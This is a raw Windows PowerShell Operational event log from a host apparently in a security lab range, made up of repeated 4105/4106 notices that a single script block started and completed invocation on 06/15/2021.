ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473472
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473471
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473470
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473469
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473468
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473466
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473465
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473464
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473463
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473462
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473461
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473460
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473459
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473458
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473457
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473456
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473455
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473454
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473453
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473452
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473451
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473450
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473449
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473448
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473447
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473446
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473445
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473444
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473443
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473442
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473441
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473440
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473439
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473438
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473437
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473436
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473435
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473434
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473433
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473432
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473431
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473430
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473429
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473428
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473427
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473426
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473425
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473424
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473423
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473422
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473421
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473420
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473419
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473418
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
